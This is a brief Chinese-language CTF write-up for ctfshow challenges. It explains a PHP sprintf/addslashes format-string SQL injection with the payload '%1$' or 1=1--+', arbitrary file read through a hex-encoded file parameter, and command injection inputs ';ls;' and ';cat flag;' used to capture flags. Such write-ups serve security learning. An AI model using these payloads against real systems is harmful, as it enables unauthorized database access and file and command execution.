ctfshow 萌xin赛

萌新赛 给她

git源码泄露.得到源码为

<?php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>

查看别人题解，里写了有关sprintf函数与addslashes的作用与漏洞。从WordPress SQLi谈PHP格式化字符串问题（2017.11.01更新）

 因此构造payload：?name=admin&pass=%1$' or 1=1--+

 后查看源码得到：flag in /flag

 所以肯定存在文件包含或上传。

burp抓包得知有file参数值经decoder模块ascll hex decode 后为flag.txt。

更改file参数的值，得知函数为 file_get_content().

/flag ascll hex encode为2f666c6167 更改file为之，得到flag。

 签到题

传入?url=;ls; 看见了flag。

 再传入?url=;cat flag;  得到flag。